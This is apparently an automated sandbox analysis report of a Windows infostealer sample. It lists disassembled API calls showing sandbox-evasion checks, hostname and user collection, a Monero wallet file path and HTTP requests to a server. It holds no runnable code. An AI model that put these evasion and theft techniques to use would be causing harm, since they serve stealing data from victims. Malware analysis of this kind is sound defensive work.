                                • Part of subcall function 00C6A820: lstrlen.KERNEL32(00C54F05,?,?,00C54F05,00C70DDE), ref: 00C6A82B
                                • Part of subcall function 00C6A820: lstrcpy.KERNEL32(00C70DDE,00000000), ref: 00C6A885
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C65644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C656A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C65857
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C651F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C65228
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C652C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C65318
                                • Part of subcall function 00C652C0: lstrlen.KERNEL32(00000000), ref: 00C6532F
                                • Part of subcall function 00C652C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00C65364
                                • Part of subcall function 00C652C0: lstrlen.KERNEL32(00000000), ref: 00C65383
                                • Part of subcall function 00C652C0: lstrlen.KERNEL32(00000000), ref: 00C653AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C6578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C65940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C65A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00C65A1B
                              Strings
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: b3cef7b9441042d6c3a86c5e1b310a1a659a979049ca4e0ee8117b6c872c3eab
                              • Instruction ID: 508223a36f3ef740a7282a444552bd345a7416b1c46b537a20024c5fea23f02c
                              • Opcode Fuzzy Hash: b3cef7b9441042d6c3a86c5e1b310a1a659a979049ca4e0ee8117b6c872c3eab
                              • Instruction Fuzzy Hash: 33E12E71910104AACB24FBA1DCD7AED7378AF58300F548529B50677192EF346B4DEFA2

                              Control-flow Graph
                              • Graph rendering not reproduced. Function at 00C617A0: an initial StrCmpCA whose failing branch calls ExitProcess, followed by a dispatch block at 00C61817 that fans out into a series of StrCmpCA comparisons and string-building subcalls, all rejoining at 00C6199E before the loop test at 00C617F4.
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00C617C5
                              • ExitProcess.KERNEL32 ref: 00C617D1
                              Strings
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: fd9018676e35c2bc9c51ecd74a70abe1260a520a718a66d511d986977de47a05
                              • Instruction ID: cbacc06793031d540f294f89c82fd464236420a13443147b4053c9fa9342df03
                              • Opcode Fuzzy Hash: fd9018676e35c2bc9c51ecd74a70abe1260a520a718a66d511d986977de47a05
                              • Instruction Fuzzy Hash: FC51A3B4A04209EFCB24DFA2D998BBE77B5BF44305F1C845AE805B7240D770EA45DB62

                              Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                              Basic blocks and edges: 1356 c67500-c6754a GetWindowsDirectoryA 1357 c67553-c675c7 GetVolumeInformationA call c68d00 * 3 1356->1357 1358 c6754c 1356->1358 1365 c675d8-c675df 1357->1365 1358->1357 1366 c675e1-c675fa call c68d00 1365->1366 1367 c675fc-c67617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 c67628-c67658 wsprintfA call c6a740 1367->1369 1370 c67619-c67626 call c6a740 1367->1370 1377 c6767e-c6768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C67542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C6757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C67603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C6760A
                              • wsprintfA.USER32 ref: 00C67640
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 031702d9eb99e78ad93744104928e53b8c19131dfd71ca74b5c5ee4188f09e58
                              • Instruction ID: be3902c7e70b22afd3d20f778164c5693eb99a68268d589f24400db3d84c1b48
                              • Opcode Fuzzy Hash: 031702d9eb99e78ad93744104928e53b8c19131dfd71ca74b5c5ee4188f09e58
                              • Instruction Fuzzy Hash: 7E4182B1D04248AFDB20DF94DC85BEEBBB8EF18704F140599F50977280D778AA48CBA5

                              Control-flow Graph (graph image omitted)
                              APIs
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F24B8), ref: 00C698A1
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2410), ref: 00C698BA
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2458), ref: 00C698D2
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2488), ref: 00C698EA
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2500), ref: 00C69903
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F9288), ref: 00C6991B
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007E5C50), ref: 00C69933
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007E5D10), ref: 00C6994C
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2230), ref: 00C69964
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2278), ref: 00C6997C
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2368), ref: 00C69995
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2398), ref: 00C699AD
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007E5E10), ref: 00C699C5
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F24A0), ref: 00C699DE
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C511D0: ExitProcess.KERNEL32 ref: 00C51211
                                • Part of subcall function 00C51160: GetSystemInfo.KERNEL32(?), ref: 00C5116A
                                • Part of subcall function 00C51160: ExitProcess.KERNEL32 ref: 00C5117E
                                • Part of subcall function 00C51110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C5112B
                                • Part of subcall function 00C51110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C51132
                                • Part of subcall function 00C51110: ExitProcess.KERNEL32 ref: 00C51143
                                • Part of subcall function 00C51220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C5123E
                                • Part of subcall function 00C51220: __aulldiv.LIBCMT ref: 00C51258
                                • Part of subcall function 00C51220: __aulldiv.LIBCMT ref: 00C51266
                                • Part of subcall function 00C51220: ExitProcess.KERNEL32 ref: 00C51294
                                • Part of subcall function 00C66770: GetUserDefaultLangID.KERNEL32 ref: 00C66774
                                • Part of subcall function 00C51190: ExitProcess.KERNEL32 ref: 00C511C6
                                • Part of subcall function 00C67850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C511B7), ref: 00C67880
                                • Part of subcall function 00C67850: RtlAllocateHeap.NTDLL(00000000), ref: 00C67887
                                • Part of subcall function 00C67850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C6789F
                                • Part of subcall function 00C678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C67910
                                • Part of subcall function 00C678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C67917
                                • Part of subcall function 00C678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C6792F
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007F9208,?,00C7110C,?,00000000,?,00C71110,?,00000000,00C70AEF), ref: 00C66ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C66AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00C66AF9
                              • Sleep.KERNEL32(00001770), ref: 00C66B04
                              • CloseHandle.KERNEL32(?,00000000,?,007F9208,?,00C7110C,?,00000000,?,00C71110,?,00000000,00C70AEF), ref: 00C66B1A
                              • ExitProcess.KERNEL32 ref: 00C66B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: b7dc13c4c299c9c1ae7cbd7363e38b0ad1a2a785c6719ef0765fbff22429ecbd
                              • Instruction ID: 994b1c694f3123c9a4c47277f160fe0593e78c8a7942d4c4aff0c83963012bcb
                              • Opcode Fuzzy Hash: b7dc13c4c299c9c1ae7cbd7363e38b0ad1a2a785c6719ef0765fbff22429ecbd
                              • Instruction Fuzzy Hash: E0314370910208ABDB24FBF1DC97BEE7778AF04300F144529F512B61C2DF705945EAA6

                              Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                              Basic blocks and edges: 1436 c51220-c51247 call c689b0 GlobalMemoryStatusEx 1439 c51273-c5127a 1436->1439 1440 c51249-c51271 call c6da00 * 2 1436->1440 1441 c51281-c51285 1439->1441 1440->1441 1443 c51287 1441->1443 1444 c5129a-c5129d 1441->1444 1446 c51292-c51294 ExitProcess 1443->1446 1447 c51289-c51290 1443->1447 1447->1444 1447->1446
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C5123E
                              • __aulldiv.LIBCMT ref: 00C51258
                              • __aulldiv.LIBCMT ref: 00C51266
                              • ExitProcess.KERNEL32 ref: 00C51294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 7f5aa58a38f6018ead2b77dfb87e7dcb9c7e333c425f00a39b1f20c8c9b07aa4
                              • Instruction ID: 19ead3118d36f59451b6ccdac92a300def1421eea6d0cd9b51d4a5901a0c54af
                              • Opcode Fuzzy Hash: 7f5aa58a38f6018ead2b77dfb87e7dcb9c7e333c425f00a39b1f20c8c9b07aa4
                              • Instruction Fuzzy Hash: FB0162B0D44308BADB10DFD1CC49B9EB778AF04706F248055EB05B61C0D7745689979D

                              Control-flow Graph (graph image omitted; legend: Executed / Not Executed)
                              Basic blocks and edges: 1450 c66af3 1451 c66b0a 1450->1451 1453 c66b0c-c66b22 call c66920 call c65b10 CloseHandle ExitProcess 1451->1453 1454 c66aba-c66ad7 call c6aad0 OpenEventA 1451->1454 1460 c66af5-c66b04 CloseHandle Sleep 1454->1460 1461 c66ad9-c66af1 call c6aad0 CreateEventA 1454->1461 1460->1451 1461->1453
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007F9208,?,00C7110C,?,00000000,?,00C71110,?,00000000,00C70AEF), ref: 00C66ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C66AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00C66AF9
                              • Sleep.KERNEL32(00001770), ref: 00C66B04
                              • CloseHandle.KERNEL32(?,00000000,?,007F9208,?,00C7110C,?,00000000,?,00C71110,?,00000000,00C70AEF), ref: 00C66B1A
                              • ExitProcess.KERNEL32 ref: 00C66B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 9faca0caf1a953ed926159c9460f86a113a1a33220f64a5fc005baff334b6fe9
                              • Instruction ID: c4ad4496aed186ed592c9023720128aede04e2b5d10ca7e1a8e1b6d60aaa6cde
                              • Opcode Fuzzy Hash: 9faca0caf1a953ed926159c9460f86a113a1a33220f64a5fc005baff334b6fe9
                              • Instruction Fuzzy Hash: 8AF03A30940209EFE720ABE19C8ABBD7A74EF04701F144526F912B1182CBB05544FAA6

                              Control-flow Graph (graph image omitted)
                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C54839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00C54849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: f50d514723a0203dbef2bf0851e06db0a6bec514be4f7e65f3ae413e21099d32
                              • Instruction ID: 32df5436f12472a8dcc88074948088a826bedf6f7dc83f93b9f1250e7c79916f
                              • Opcode Fuzzy Hash: f50d514723a0203dbef2bf0851e06db0a6bec514be4f7e65f3ae413e21099d32
                              • Instruction Fuzzy Hash: C4212CB1D00209ABDF14DFA5E845ADE7B74EB44320F148626E915B72C1EB706A09DF92

                              Control-flow Graph (graph image omitted)
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C56280: InternetOpenA.WININET(00C70DFE,00000001,00000000,00000000,00000000), ref: 00C562E1
                                • Part of subcall function 00C56280: StrCmpCA.SHLWAPI(?,007FE758), ref: 00C56303
                                • Part of subcall function 00C56280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C56335
                                • Part of subcall function 00C56280: HttpOpenRequestA.WININET(00000000,GET,?,007FE338,00000000,00000000,00400100,00000000), ref: 00C56385
                                • Part of subcall function 00C56280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C563BF
                                • Part of subcall function 00C56280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C563D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C65228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 30dcfa14b53e7ba8dd6d0111bd286d0c3f688aabc594d7b0def0335164c98efb
                              • Instruction ID: af4233f6a020103bda4188091691ce3a012e4accc76a634fa0038cc11de64bd0
                              • Opcode Fuzzy Hash: 30dcfa14b53e7ba8dd6d0111bd286d0c3f688aabc594d7b0def0335164c98efb
                              • Instruction Fuzzy Hash: FF110330910148ABCB24FFA5DDD6AED7778AF54300F904164FD1A67592EF306B09EE91
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C5112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C51132
                              • ExitProcess.KERNEL32 ref: 00C51143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: f5a1559c3292882c855f88d05038f3f17158f248e5da06fc7730388342149c8d
                              • Instruction ID: 78e680e1eef0bae4e15933d56719a96371f755733482ee5474b339414f2abaeb
                              • Opcode Fuzzy Hash: f5a1559c3292882c855f88d05038f3f17158f248e5da06fc7730388342149c8d
                              • Instruction Fuzzy Hash: B7E0E674955308FFE7246BA19C0EB0D76B8EF04B02F144057FB09761D0D6B5264496D9
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C510B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C510F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
